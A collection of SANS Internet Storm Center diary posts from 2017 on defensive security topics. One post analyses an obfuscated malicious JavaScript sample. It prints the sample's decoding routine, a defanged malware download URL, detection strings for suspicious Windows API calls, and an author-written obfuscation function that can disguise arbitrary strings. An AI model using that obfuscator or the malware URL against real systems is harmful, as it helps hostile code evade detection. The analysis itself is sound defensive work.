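# in a series of per-interval byte counts.
def find_spikes(samples, factor=10):
    """Return indices where traffic jumps to >= factor x the running average."""
    spikes, total = [], 0
    for i, v in enumerate(samples):
        avg = total / i if i else v   # running average of prior samples
        if avg and v >= factor * avg:
            spikes.append(i)
        total += v
    return spikes

print(find_spikes([100, 110, 90, 105, 2000, 95]))  # → [4]
```

Feeding it per-minute byte counts from your edge router would flag the interval containing a sudden burst while ignoring normal variation.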

And please forward any e-mails like this to us. It would be nice to get a few more samples to look for patterns. As I said above, this isn't new, but people still appear to pay up in response to these fake threats.

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute


Published: 2017-06-22

Obfuscating without XOR

Malicious files are generated and spread across the Internet daily (read: "hourly"). The attackers' goal is to use files that are:

  • not known to signature-based solutions
  • not easy for the human eye to read

That’s why many obfuscation techniques exist to evade automated tools and mislead security analysts. In most cases, it’s just a question of time before the obfuscated data is decoded. A classic technique is the XOR cipher[1]. This is definitely not a new technique (see a previous diary[2] from 2012) but it is still heavily used, and many tools can automate the search for XOR’d strings. Viper, the binary analysis and management framework, is a good example. It can scan for XOR'd strings easily:

viper tmpnYaBJs > xor -a
[*] Searching for the following strings:
- This Program
- GetSystemDirectory
- CreateFile
- IsBadReadPtr
- IsBadWritePtrGetProcAddress
- LoadLibrary
- WinExec
- CreateFileShellExecute
- CloseHandle
- UrlDownloadToFile
- GetTempPath
- ReadFile
- WriteFile
- SetFilePointer
- GetProcAddr
- VirtualAlloc
- http
[*] Hold on, this might take a while...
[*] Searching XOR
[!] Matched: http with key: 0x74
[*] Searching ROT
viper tmpnYaBJs >
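Outside of Viper, the brute-force idea is simple to reproduce yourself: XOR the data with every possible single-byte key and check whether any known plaintext markers appear. A quick sketch (the marker list is abbreviated; this is not Viper's actual code):

```python
# Brute-force all 256 single-byte XOR keys against a blob of data and
# report which known plaintext markers show up for which key.
def xor_scan(data: bytes, markers=(b"http", b"This Program", b"CreateFile")):
    hits = []
    for key in range(256):
        decoded = bytes(b ^ key for b in data)
        for marker in markers:
            if marker in decoded:
                hits.append((marker.decode(), key))
    return hits

# Example: "http" XOR'd with key 0x74, as in the Viper output above
sample = bytes(b ^ 0x74 for b in b"http")
print(xor_scan(sample))  # → [('http', 116)]
```

Real tools also try rolling multi-byte keys and ROT variants, but the single-byte loop already catches a surprising amount of commodity malware.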

Today, many Javascript or VBS files implement other obfuscation techniques that do not rely on XOR. Yesterday, I found a sample with such behaviour. A first quick analysis revealed that almost no strings appeared in clear text in the source; instead, a function call was used in place of regular strings, like:

var bcacfdfaebbbfDeck = new ActiveXObject(dbdbfaeefccaee('+L+^%^LK%,LpL(KeL^%z%+%u%u',1));

I took some time to check how the obfuscation was performed. How does it work?

The position of each character is looked up in the $data variable and decreased by one. The character found at the new position is then used to build a string of hex codes. Finally, the hex codes are converted into the final string. Here is an example with the first two characters of the string above:

$data = "SYOm7L-3^o&x4(CuD0p5+@rW*qvUEec!8zZsQhdIwaHn:Tf9,Vyil6%;jXtMA2Kbk_FN)GB.$1PJgR";

  • "+" is located at pos 20, search the character at position 19 (20 - 1): "5"
  • "L" is located at pos 5, search the character at position 4 (5 - 1): "7"
  • "57" is the hex code for "W"
  • etc...

Here is the beautified code from the malicious file:

// Convert a string from hex chars to string.
// In: "575363726970742E7368656C6C"
// Out: "WScript.shell"
function hex2string(hexstring) {
    var bufferin = hexstring.toString();
    var bufferout = '';
    for (var i = 0; i < bufferin.length; i += 2)
        bufferout += String.fromCharCode(parseInt(bufferin.substr(i, 2), 16));
    return bufferout;
}

// Deobfuscate the string by shifting each character back by 'step'
function deobfuscate(string,step){
    var data = "SYOm7L-3^o&x4(CuD0p5+@rW*qvUEec!8zZsQhdIwaHn:Tf9,Vyil6%;jXtMA2Kbk_FN)GB.$1PJgR";
    var bufferout = "";
    var l = data.length-1;
    var size = string.length;    

    for (var i = 0; i <size ; i++){        
        var p = data.indexOf(string.charAt(i));        
        var p2 = p - step;        
        if (p2 < 0) {            
            p2 = l - Math.abs(p2);
            var l2 = l - 1;            
            if (p2==l2)
               p2 = p2 + step;
        }
        bufferout = bufferout + data.charAt(p2);
    }
    // Convert to string
    return hex2string(bufferout);
}

This code:

var s = deobfuscate('%zL(L(Lp^2KNKN^P^z^+Ke^P^+^(Ke^+^KKe^P^p^PKN%u%N%L%NKe%,%0%L',1);
WScript.Echo(s);

Returns:

hxxp://185.154.52.101/logo.img
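For analysis outside of a Windows scripting host, the decoding routine is easy to port. Here is a sketch in Python, mirroring the JavaScript above and checked against the ActiveXObject string from the sample:

```python
# Python port of the sample's decoding routine: shift each character back
# by 'step' in the lookup table, then interpret the result as hex codes.
DATA = "SYOm7L-3^o&x4(CuD0p5+@rW*qvUEec!8zZsQhdIwaHn:Tf9,Vyil6%;jXtMA2Kbk_FN)GB.$1PJgR"

def deobfuscate(s, step=1):
    l = len(DATA) - 1
    out = []
    for ch in s:
        p2 = DATA.index(ch) - step
        if p2 < 0:                    # wrap around, as in the JS code
            p2 = l - abs(p2)
            if p2 == l - 1:
                p2 += step
        out.append(DATA[p2])
    return bytes.fromhex("".join(out)).decode("ascii")

print(deobfuscate('+L+^%^LK%,LpL(KeL^%z%+%u%u', 1))  # → WScript.shell
```

This recovers the first argument of the ActiveXObject call shown earlier without ever executing the malicious script.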

And when you understand how to deobfuscate, it’s easy to write the opposite function. So I quickly wrote the function to obfuscate any string based on the same technique:

function obfuscate(string,step){
    var data = "SYOm7L-3^o&x4(CuD0p5+@rW*qvUEec!8zZsQhdIwaHn:Tf9,Vyil6%;jXtMA2Kbk_FN)GB.$1PJgR";
    var bufferout = "";
    var l = data.length-1;
    var size = string.length;
    for (var i = 0; i <size ; i++){
        // Convert the character to its two-digit hex code
        var hvalue = Number(string.charCodeAt(i)).toString(16).toUpperCase();
        for (var j=0; j < 2; j++) {
            // Shift each hex digit forward by 'step' in the data table
            var p = data.indexOf(hvalue.charAt(j));
            var p2 = p + step;
            if (p2 > l) {
                // Wrap around the end of the table
                p2 = p2 - (l + 1);
            }
            bufferout = bufferout + data.charAt(p2);
        }
    }
    return bufferout;
}

This code:

var foo = obfuscate("https://isc.sans.edu", 1);
WScript.echo(foo);

Returns:

%zL(L(LpL^^2KNKN%,L^%^KeL^%P%eL^Ke%+%(L+

Of course, the method analyzed here is a one-shot! The number of ways to obfuscate data is unlimited...

[1] https://en.wikipedia.org/wiki/XOR_cipher
[2] https://isc.sans.edu/forums/diary/Decoding+Common+XOR+Obfuscation+in+Malicious+Code/13354

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key


Published: 2017-06-21

It has been a month and a bit; how is your new patching program holding up?

Last month's entertainment for many of us was of course the WannaCry MS17-010 update. For some of you it was a relaxing time, just like any other month. Unfortunately, for the rest of us it was a rather busy period trying to patch systems that in some cases had not been patched in months or even years. Others discovered that whilst security teams had been saying "you want to open what port to the internet?", firewall rules had been approved allowing port 445 and in some cases even 139. Another group of users discovered that the firewall that used to be enabled on their laptop was no longer enabled whilst connected to the internet. Anyway, that was last month. On the back of it we all made improvements to our vulnerability management processes. You did, right?

Ok, maybe not yet; people are still hurting. However, when an event like this happens it is a good opportunity to revisit the process that failed, identify why it went wrong for you and make improvements. Not the sexy part of security, but we can't all be threat hunting 24/7.

If you haven't started yet, or the new process isn't quite where it needs to be, where do you start?
Maybe start with how fast or slow you should patch. Various standards suggest that you must be able to patch critical and high-risk issues within 48 hours. Not impossible if you approach it the right way, but you do need to have the right things in place to make this happen.
You will need: 

  • Asset information - you need to know what you have, how critical it is and of course what is installed on it.  Look at each system you have, evaluate the confidentiality, integrity and availability requirements of the system and categorise the systems into critical and less critical systems to the organisation. 
  • Vulnerability/Patch information - you need information from vendors, open source and commercial alike. Subscribe to the various lists, get a local RSS feed, etc. Vendors are generally quite keen to let you know once they have a patch. 
  • Assessment method – The information received needs to be evaluated.  Review the issue.  Are the systems you have vulnerable? Are those systems that are vulnerable flagged as important to the business? If the answer is yes to both questions (you may have more), then they go on the “must patch” now list.  The assessment method should contain a step to document your decision. This will keep auditors happy, but also allows you to better manage risk.  
  • Testing Regime – Speed in patching processes comes from the ability to test the required functionality quickly and the reliability of those tests. Having standard tests or even better automated tests can speed up the validation process allowing patching to continue.  

Once you have the four core ingredients you are now in a position to know what vulnerabilities are present and hopefully patchable. You know the systems that are most affected by them and have the highest level of risk to the organisation. 

The actual mechanics of patching are individual to each organisation. Most of us, however, will be using something like WSUS, SCCM or third-party patching products, and/or their Linux equivalents like Satellite, Puppet, Chef, etc. In the tool used, define the various categories of systems you have, reflecting their criticality. Ideally have a test group for each; Dev or UAT environments, if you have them, can be great for this. I also often create a "The Rest" group. This category contains servers that have a low criticality and can be rebooted without much notice. For desktops, I often create a test group, a pilot group and a group for all remaining desktops. The pilot group has representatives of most, if not all, types of desktops/notebooks used in the organisation.

When patches are released they are evaluated and, if they are to be pushed, they are released to the test groups as soon as possible. Basic functionality and security testing is completed to make sure that patches are not causing issues. Depending on the organisation we often push DEV environments first, then UAT after a cycle of testing. Within a few hours of release you should have some level of confidence that the patches are not going to cause issues. Your timezone may even help you here. In AU, for example, patches are often released during the middle of our night, which means other countries may already have encountered issues and reported them (keep an eye on the ISC site) before we start patching.
The next step is to release the patch to "The Rest" group and, for desktops, to the pilot group. Again, testing is conducted to gain confidence that the patch is not causing issues. Remember these are low-criticality servers and desktops. Once happy, start scheduling the production releases. Post reboot, run the various tests to restore confidence in the system and you are done.

The biggest challenge in the process is getting a maintenance window to reboot. The best defence against having your window denied is to schedule them in advance and get the various business areas to agree to them.  Patch releases are pretty regular so they can be scheduled ahead of time. I like working one or even two years in advance.  

The second challenge is the testing of systems post patching. This will take the most prep work. Some organisations will need to get people to test systems. Some may be able to automate tests.  If you need people, organise test teams and schedule their availability ahead of time to help streamline your process. Anything that can be done to get confidence in the patched system faster will help meet the 48 hour deadline. 

If going fast is too daunting, make the improvements in baby steps. If you generally patch every three months, implement your own ideas, or some of the above, and see if you can reduce it to two months. Once that is achieved, try to reduce it further.

If you have your own thoughts on how people can improve their processes, or you have failed (we can all learn from failures), then please share. The next time there is something similar to WannaCry, we all want to be able to say "sorted that ages ago".

Mark H - Shearwater
 


Published: 2017-06-20

Windows Error Reporting: DFIR Benefits and Privacy Concerns

This post is a guest diary by Renato Marinho. If you have any technical posts like this you would like to share with our community; please let us know.

  1. Introduction

Recently, I was confronted with a scenario where a very suspicious Windows pop-up message was shown to a specific user on a corporate network. It was a default "Yes/No" Windows dialog box and, although I cannot reveal the message content, I can assure you that it was in the context of what the user was doing on his computer at that moment.

As we were dealing with a major incident on the same network, our first assumption was that someone had compromised that machine and was controlling it remotely through a reverse connection - the type of situation that urges for a rapid response.

However, after a few hours hunting for any piece of malware on that machine, including operating system events, network connections, user Internet history, e-mail attachments, external devices and so on, nothing interesting was found. In fact, the evidence came from a source I had never imagined could help in an incident response: Windows Error Reporting (WER), as described in this diary.

  2. The subtle clue

As no malware evidence was found, we decided to get back to the drawing board, and after looking carefully at the strange message, I noticed that whatever application the "attacker" had used to present the message, it was hanging. The classic "(Not Responding)" string was shown in the dialog window title, as seen in Figure 1.

Figure 1 – “Not Responding” application sample

By default, when an application hangs or crashes on a Windows system, the Windows Error Reporting (WER) mechanism [1] automatically gathers detailed debug information, including the application name, loaded modules and, more importantly, a heap dump, which contains the data loaded in the application's memory at the time it was collected. All this data is reported to Microsoft which, in turn, may provide users with solutions for known problems.

As the application used to send the strange message had hung, chances were that we could find generated WER artifacts to analyze and track the supposed intrusion. Thus, our next step was looking for them.

  3. Collecting WER information

To demonstrate how we found and analyzed the WER files related to that hung application without exposing real incident information, we created a similar scenario and used it for this analysis.

  4. Crashing an application

Using a default Windows 10 installation in our lab, the first thing was forcing an application to crash. For this purpose, we used the text editor Notepad++ as the application to be crashed and the Process Explorer tool [2] as the means to cause it.

For later analysis purposes, we typed a simple text in the editor, as seen in Figure 2, and, through Process Explorer, started killing random ‘ntdll.dll’ threads, as shown in Figure 3.

Figure 2 – Application to be crashed

Figure 3 – Killing application threads

It didn’t take long for the application to become unstable and crash. Exactly at 4:00:11 PM the application stopped working, and Windows started collecting information about the problem, as seen in Figure 4. That was WER in action.

Figure 4 – WER collecting information about crashed application

  5. Looking for evidence

The WER process leaves tracks on the system. One of them is an error log entry detailing the application crash, as shown in Figure 5.

Figure 5 – Application event log evidence

Note that the event ID for a crashed application is 1000, while for a hanging application it is 1002.

The other evidence are the WER files themselves which, depending on the Windows version, are generated in different paths and can be found through different control panel menu options. On Windows 7, for example, WER settings and reports can be accessed through the Action Center, and on Windows 8 through Problem Reports and Solutions.

On Windows 10, used in our demonstration scenario, the WER menu can be opened through the menu Control Panel -> System and Security -> Security and Maintenance -> Reliability Monitor. In Figure 6 you can see an example of this menu from which a specific error can be selected for further details.

Figure 6 – Looking for the specific problem report

So, opening the details of our crash event, as shown in Figure 7, we can access the files generated by WER. IMPORTANT: depending on the WER configuration you have chosen, those files are going to be sent to Microsoft and, after that, deleted from the disk. This is the default behavior, which may be changed through Windows Registry [3] modifications.

Figure 7 – WER problem details

Another way to find WER files is going directly to the path where they are created on disk. On Windows 10, WER report files can be found under the path "%SystemDrive%\ProgramData\Microsoft\Windows\WER". In Figures 8 and 9, you can see the files generated for our demonstration scenario.

Figure 8 – WER file path

Figure 9 – WER file list

  6. Analyzing the evidence

Now, returning to the real incident case: when we searched for event log evidence, we found that an application had hung on that machine moments before the message screenshot was taken. Better than that, we also found the WER files associated with that application hang!

You may be wondering how I could find WER files on the machine if they are deleted from disk after being sent to Microsoft. The point is: they weren't sent. These were my hypotheses:

  1. The machine was disconnected from the network moments after the strange message appeared, preventing Windows from sending the report to Microsoft;

  2. The WER report wasn't sent to Microsoft due to the SSL inspection employed on that network's Internet access.

Although hypothesis 1 is plausible, the experiments we ran validated hypothesis 2: with SSL inspection in place (in other words, a man-in-the-middle attack), our Windows instance refused to send WER reports and returned an error message, as seen in Figure 10.

Figure 10 – Problem uploading WER during the MITM attack

Heading back to the real scenario: with the WER files in our hands, we could discover the name of the application that had likely generated that suspicious pop-up message and, by inspecting the heap dump file, we could confirm it. It turns out that we found the exact pop-up message content in the memory dump file using a simple "strings" command, although there is a more orthodox way to inspect and debug those files using Windbg [4].
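If the strings command isn't at hand, the same approach is only a few lines of Python (a sketch; the dump path is whatever file WER produced for the hang):

```python
# Extract printable-ASCII runs from a binary file, like the "strings" tool.
import re

def strings(path, min_len=4):
    """Return all printable-ASCII runs of at least min_len bytes in a file."""
    with open(path, "rb") as f:
        data = f.read()
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]
```

Running it over the heap dump and searching the output for the suspicious text is equivalent to the strings-and-grep pipeline used here.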

Employing the same "strings" method to look for the text typed into Notepad++ before crashing it, we get the result shown in Figure 11.

Figure 11 – Evidence found

  7. Final words

As we could see, in addition to helping Windows users to deal with application crashes and hangs, this case demonstrated that WER can be extremely useful for post-mortem analysis. Depending on the scenario, it’s like having an application memory dump to analyze as part of your DFIR activities without having collected it during the incident.

On the other hand, it raises some concerns regarding data leaking through the memory dump files. Considering that you have consented to send that information to Microsoft (whether or not you remember doing so [5]), there is the possibility of that content being accessed by third parties, like an intruder who escalated privileges on the targeted machine, or simply the new employee now using your machine, when you thought that removing your user home directory would be enough.

Things may get worse if we consider that the crashed or hung application is, for example, a password manager. We did experiments on a group of them and privately reported those that allowed us to recover clear-text passwords from WER memory dumps. The Enpass password manager has already published a security bulletin and a new version fixing the vulnerability [6], to which CVE-2017-9733 [7] has been assigned.

For Windows application developers in general, to prevent sensitive information exfiltration from crash dumps, we recommend either completely disabling WER triggering by using AddERExcludedApplication or WerAddExcludedApplication functions [8] or by excluding the memory region that may contain sensitive information using the function WerRegisterExcludedMemoryBlock [9] (available only on Windows 10 and later).

A more comprehensive solution should be provided by Windows itself that could protect report files by encrypting them - at least the memory dumps. Interestingly, there is a patent from IBM exactly about protecting application core dump files [10]. Today, the encryption is employed only while sending WER report files to Microsoft through SSL connections.

Regarding our case, in the end we fortunately realized that there was no violation or intrusion on that machine. It was, indeed, a misuse of a legitimate tool by an internal employee, which taught us a bit more about the importance of WER files to digital forensics and user privacy.

  8. References

[1] https://msdn.microsoft.com/en-us/library/windows/desktop/bb513613(v=vs.85).aspx

[2] https://technet.microsoft.com/en-us/sysinternals/processexplorer.aspx

[3] https://msdn.microsoft.com/pt-br/library/windows/desktop/bb513638(v=vs.85).aspx

[4] https://blogs.msdn.microsoft.com/johan/2007/11/13/getting-started-with-windbg-part-i/

[5] https://privacy.microsoft.com/en-US/windows-10-feedback-diagnostics-and-privacy

[6] https://www.enpass.io/blog/an-update-on-the-reported-vulnerability-regarding-wer-in-enpass-for-windows-pc/

[7] https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9733

[8] https://msdn.microsoft.com/en-us/library/windows/desktop/bb513635(v=vs.85).aspx

[9] https://msdn.microsoft.com/en-us/library/windows/desktop/mt492587(v=vs.85).aspx

[10] https://www.google.com/patents/US20090172409?lipi=urn%3Ali%3Apage%3Ad_flagship3_messaging%3BELSwd1O0TB2NSjH9aPn1BA%3D%3D

 

Renato Marinho

Morphus Labs | linkedin.com/in/renatomarinho | @renato_marinho


Published: 2017-06-19

As Your Admin Walks Out the Door ..

One of our readers (thanks Gebhard) mailed us a link to an article on what the press is apparently now calling a "Revenge Wipe" - a system administrator who has left the organization, and as a "last hurrah", deletes or locks out various system or infrastructure components.

In this case, the organization was a hosting company in the Netherlands (Verelox). At a cloud provider, a disgruntled admin may have access to delete entire networks, hosts, and associated infrastructure. At a smaller CSP, the administrator may have access to delete customer servers and infrastructure as well. In Verelox's situation, that seems to have been the case (from their press release at least).

The classic example of this is the City of San Francisco in 2008, where their main administrator (Terry Childs) refused to give up the credentials to their "FiberWAN" network infrastructure, even after being detained by law enforcement (he eventually gave the credentials directly to the Mayor). I've listed several other examples in the references below. Note that this was not a new thing even in 2008; it has been a serious consideration for as long as we've had computers.

So, how should an organization protect themselves from a situation like this?

Back up Job Responsibilities:

Know who has access to what. Have multiple people with access to each system. Having any system with only a single administrator can turn into a real problem in the future. DOCUMENT things. BACK UP your configurations in addition to your data.

Use Authorization:

It can be difficult, but wherever possible use admin accounts with only the rights required. It’s very easy to build an “every admin has all rights” infrastructure. It’s likely more difficult to build a “why does the VMware admin need the rights to delete an entire LUN on the SAN” config, but it’s important to think along those lines wherever you can.

Use a back-end directory for authentication to network infrastructure:

What this often means is that folks implement NPS (RADIUS) services in Active Directory. This allows you to audit access and changes during regular production, and also allows you to deactivate network administrator accounts in one place.

Where you can, use Two Factor Authentication

Use 2FA wherever possible; this makes password attacks much less of a threat. 2FA is a definite "easy implement" for VPN and other remote access, and also for administration of almost all cloud services your organization uses.

Just as a side note: I am still seeing that many smaller CSPs have not gone forward with 2FA. If you are looking at any new cloud services, adding two-factor authentication as a "must-have" is a good way to go.

Deal with "Stale" Accounts:

Keep track of accounts that are not in use.  I posted a powershell script for this (targeting AD) in a previous story ==> https://isc.sans.edu/diary/The+Powershell+Diaries+-+Finding+Problem+User+Accounts+in+AD/19833

Deal with "Service Accounts":

Service accounts are used in Windows and other operating systems to run things like Windows services, or to allow scripts to log in to various systems as they run. The common situation is that these service accounts have Domain Administrator or local root access (depending on the OS).

Know in your heart that the person you are protecting the organization from is the same person who likely created one or all of these accounts. 

Be sure that these service accounts are documented as they are created, so that if a mass change is required it can be done quickly.

Make sure these accounts use a central directory (such as AD or LDAP), so that if you need to change or disable them, there is one place to go.

I posted a PowerShell script in a previous story to inventory service accounts in AD ==> https://isc.sans.edu/forums/diary/Windows+Service+Accounts+Why+Theyre+Evil+and+Why+Pentesters+Love+them/20029/

Restrict Remote Access:

Be sure that your administrative accounts don't have remote access (VPN, RDP Gateway, Citrix CAG, etc.). This falls into the same category as "don't allow administrators to check mail or browse the internet while logged in with Domain Admin or root privileges".

On the day:

On the day of termination, be sure that all user accounts available to your administrator are deactivated during the HR interview. If you've used a central authentication store, this should be easy (or at least easier).

Also force a global password change for all users (your departing admin has probably done password resets for many of your users), and if you have any stale accounts simply deactivate those.

For service accounts, update the passwords for all of these. This is a good time to make sure that you aren't following a pattern for these passwords; use long random strings (l33t-speak versions of your company or product name are not good choices here).
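For generating those long random strings, any decent CSPRNG-backed generator will do; a minimal sketch using Python's standard library (the 32-character length is an arbitrary choice):

```python
# Generate a long random service-account password using the secrets
# module, which is backed by the OS CSPRNG.
import secrets
import string

def random_password(length=32):
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(random_password())  # e.g. a 32-character random string
```

Store the result straight into your password vault; nobody should ever need to type or remember it.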

I'm sure that I've missed some important things; please use our comment form to fill out the picture. This is a difficult topic: since many of us are admins for one thing or another, this really hits close to home. But for the same reason, it's important that we deal with it correctly, or as correctly as the situation allows.

References:

https://www.heise.de/newsticker/meldung/Revenge-Wipe-Ex-Admin-loescht-Daten-bei-niederlaendischem-Provider-3740243.html?view=print

https://translate.google.com/translate?sl=auto&tl=en&u=https%3A//www.heise.de/newsticker/meldung/Revenge-Wipe-Ex-Admin-loescht-Daten-bei-niederlaendischem-Provider-3740243.html%3Fview%3Dprint

https://www.schneier.com/blog/archives/2008/07/disgruntled_emp.html

http://www.infoworld.com/article/2653004/misadventures/why-san-francisco-s-network-admin-went-rogue.html

https://www.scmagazine.com/former-system-admin-sentenced-to-34-mo-for-hacking-former-employer/article/640254/

https://www.wired.com/2016/06/admin-faces-felony-deleting-files-flawed-hacking-law/

http://www.independent.co.uk/news/business/news/disgruntled-worker-tried-to-cripple-ubs-in-protest-over-32000-bonus-481515.html

 

===============
Rob VandenBrink
Compugen


Published: 2017-06-17

Mapping Use Cases to Logs. Which Logs are the Most Important to Collect?

When it comes to log collection, it is always difficult to figure out what to capture. The primary considerations are cost and value. Of course you can capture every log flowing in your network, but if you don't have a use case attached to it, that equates to wasted storage and money. This is far from ideal, since most Security Information Management (SIM) systems, also referred to as Security Information and Event Management (SIEM), have a daily cost associated with log capture. Before purchasing a SIM, the first task, often a difficult one, is: what do I collect and why? We want quality over quantity. Again, what you collect has a cost: the minimum amount of time logs must be retained (how many years) has to be calculated because it is directly related to the number of events per second (EPS) collected daily [1], how many log collectors are necessary to capture what you need, etc.

Next, it is important to identify your top five use cases, based on the value they can deliver to the security team right away. This part is often difficult to pinpoint because it usually isn't an exercise the stakeholders have already worked through. In the end, it must map to the use case: what do I need to capture to be successfully alerted? Once the use cases have been identified, it is time to figure out which logs are necessary to identify the threat as it happens. You may have already identified some threats from previous incidents that can be translated into a use case.

If you are looking for some examples, Anton Chuvakin [2][3] has written extensively on SIEM and is a good place to start. The next thing to do after you have identified your five use cases is to catalog the quality of your logs in a spreadsheet with five categories: the log source (firewall, IPS, VPN, etc.), its category (user activity, email, proxy, etc.), its priority (high, medium, low), the information type (IP, hostname, username, etc.) and the matching use case (authentication, suspicious outbound activity, web application attack, etc.) [4]. The last step is to identify the SIM that will meet your goals.
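That spreadsheet can start life as something as simple as a list of records; a sketch with made-up entries illustrating the five categories:

```python
# Tiny log-source inventory: each record carries the five categories
# described above. Entries are illustrative, not a recommended baseline.
log_sources = [
    {"source": "firewall", "category": "network", "priority": "high",
     "info_type": ["IP", "port"], "use_case": "suspicious outbound activity"},
    {"source": "vpn", "category": "user activity", "priority": "high",
     "info_type": ["username", "IP"], "use_case": "authentication"},
]

def sources_for(use_case):
    """List the log sources needed to support a given use case."""
    return [s["source"] for s in log_sources if s["use_case"] == use_case]

print(sources_for("authentication"))  # → ['vpn']
```

Keeping the mapping machine-readable makes it trivial to answer "which feeds can we drop?" when the SIM bill arrives.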

[1] http://www.buzzcircuit.com/tag/siem-storage-calculator/
[2] http://blogs.gartner.com/anton-chuvakin/2014/05/14/popular-siem-starter-use-cases/
[3] http://blogs.gartner.com/anton-chuvakin/2013/09/24/detailed-siem-use-case-example/
[4] http://journeyintoir.blogspot.ca/2014/09/siem-use-case-implementation-mind-map.html
[5] https://isc.sans.edu/forums/diary/SIEM+is+not+a+product+its+a+process/20399

-----------
Guy Bruneau IPSS Inc.
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

1 Comments

Published: 2017-06-16

What is going on with Port 83?

When I'm on shift, I really like to look at the port trends and see what the changes are.  Looking at shifts in the network traffic is a great way to provide early warning that something new is out there.  So today, port 83 caught my eye because it's just not a common port you run into.  The climb in traffic has been subtle, but there were a couple of steep upticks along the way with the latest being in the last 24 hours.

First step, what normally lives as a service on this port?  Well, IANA has the following:

However, I can't find any documentation about this.  This step can sometimes be one of the most frustrating.  It's not the research itself, but finding GOOD documentation that lays out the service or protocol that normally listens on a port, and finding sample traffic, logs, etc. that can help you understand what you are seeing.  That, however, is a completely different topic, and might be a fun rabbit hole to go down later.

Now, the fun part: getting packets to figure out what is going on here.  Normally that helps, but today, not so much.  It has actually made things a little more confusing, because there are a lot of seemingly disparate items in the traffic, some of them very curious.  Johannes got a sample of traffic off our honeypot by setting up a netcat listener.  Here are a few of the interesting tidbits from the packets, but I haven't figured out how to put it all together, or whether any of it even fits together.
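The netcat listener used on the honeypot can be approximated in a few lines of Python; this is an illustrative sketch (a real honeypot service would log much more, and binding to port 83 requires root):

```python
import socket

def listen_once(host: str, port: int):
    """Accept a single TCP connection and return (peer_address, pushed_data)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        conn, peer = srv.accept()
        with conn:
            data = conn.recv(4096)  # grab whatever the scanner pushes
    return peer, data

# e.g. listen_once("0.0.0.0", 83)  # ports below 1024 need root privileges
```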

  • There was a successful three-way handshake, then one packet with the PSH and ACK flags set and that was followed by a graceful teardown.  Here is what data was pushed:

  • Now for some interesting UDP traffic (HTTP/UDP):

  • Here is another one over UDP which looks like a regular UPNP search:

  • UDP with just one recognizable word:

  • These two UDP packets seem related to TeamSpeak:

 

Who knew there was so much action on a port that I really hadn't looked at till today.  If you have any packet captures for this or any ideas how this fits together or if it's just random, please let us know!!

1 Comments

Published: 2017-06-15

Uberscammers

E-mail scams, phishing and social engineering are things that we (security people) have become really used to. Even in the penetration testing engagements I do, when we utilize social engineering it is almost always extremely successful, showing that, unfortunately, people still do not pay enough attention to the validity of the e-mails they receive.

That being said, sometimes we do encounter really good (or bad for us defenders :/) phishing attempts. A couple of weeks ago, one of our readers, Matthew Henry, sent in an example of a scam against Uber users (and we know that those number in the millions).

The e-mail appeared to be a typical Uber receipt, making it look as if the recipient had been charged for a ride in France. The e-mail is shown below:

The bait was at the bottom, and you can see it here:

Of course, none of the users who received this e-mail would have taken this trip, so the phisher in this case is trying to get people to click on the link to dispute the received receipt.

See the domain? uberdisputes.com is not an Uber domain. At the time the phishing e-mail was circulating, the domain was only a day old. If you visited the link shown above while it was still up, you would be asked to log in:

After logging in, in order to dispute the receipt, the site would of course ask for the credit card number, so the victim could be "reimbursed". You can probably guess what happened with the credit card after submission …

While none of this is particularly amazing, what I do find unbelievable is how easy it is for the bad guys to get certificates for such web sites. Although there has been a lot of discussion about how Let's Encrypt can now be used for all sorts of certificates, in this example we can see that another CA, this time COMODO, happily issued a certificate for the domain uberdisputes.com:

(Small rant: I wonder who the genius at Google was who decided to remove SSL/TLS certificate information from the lock icon in Google Chrome. Yeah, it was a great idea to make users open Developer Tools to see it. Grrr.)

Such cases are very common and always make me wonder why both CAs and big companies do not do the following:

  • For CAs: they should maintain a list of critical keywords for big players that are commonly abused in attacks. For example, I would not let automated systems issue a certificate for a domain such as microsoft-software.com (luckily, it belongs to Microsoft).
  • For big(ger) companies: I would try to register/buy most domains that are similar to the company's name, especially those that could potentially be used for phishing.
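The CA-side suggestion could start as something as simple as a keyword blocklist consulted before automated issuance. A minimal sketch follows; the keyword set and the naive registrable-domain logic are purely illustrative, not a real CA policy:

```python
# Hypothetical pre-issuance check: flag domains embedding big-brand names.
RISKY_KEYWORDS = {"microsoft", "uber", "paypal", "apple", "google"}

def needs_manual_review(domain: str) -> bool:
    """Return True if the domain's registrable part contains a brand keyword."""
    labels = domain.lower().rstrip(".").split(".")
    registrable = ".".join(labels[-2:])  # naive eTLD+1, good enough for a sketch
    return any(kw in registrable for kw in RISKY_KEYWORDS)

# needs_manual_review("uberdisputes.com") would flag the phishing domain above
```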

--
Bojan
@bojanz
INFIGO IS

5 Comments

Published: 2017-06-14

Systemd Could Fallback to Google DNS?

Google is everywhere and provides free services to everyone. Among the huge list of publicly available services are the Google DNS servers, well known as 8.8.8.8 and 8.8.4.4 (IPv4) and 2001:4860:4860::8888 and 2001:4860:4860::8844 (IPv6). But Google is far from being a non-profit organisation, and they collect a lot of data about you via their DNS[1]. Nothing is free and, when you get something for “free”, you (your data) are the valuable stuff. Never forget this!

It is already known that many systems are using the Google DNS as a fallback configuration. Docker is a good example. As written in the documentation[2]:

After this filtering, if there are no more nameserver entries left in the container's /etc/resolv.conf file, the daemon adds public Google DNS nameservers (8.8.8.8 and 8.8.4.4) to the container’s DNS configuration. If IPv6 is enabled on the daemon, the public IPv6 Google DNS nameservers will also be added (2001:4860:4860::8888 and 2001:4860:4860::8844)

Yesterday, there were some interesting tweets circulating about the same kind of behaviour, but for systemd[3].

"systemd" is the init system introduced in 2012 to replace the good old “init”. It is used to manage processes started at boot time (in userland). systemd introduced a lot of new features, but it was also the source of major flame wars in the Linux community about the pros and cons of the new system.

In the GitHub repository of systemd, in the configure.ac file, we can read the following block of code[4]:

AC_ARG_WITH(dns-servers,
        AS_HELP_STRING([--with-dns-servers=DNSSERVERS],
                [space-separated list of default DNS servers]),
        [DNS_SERVERS="$withval"],
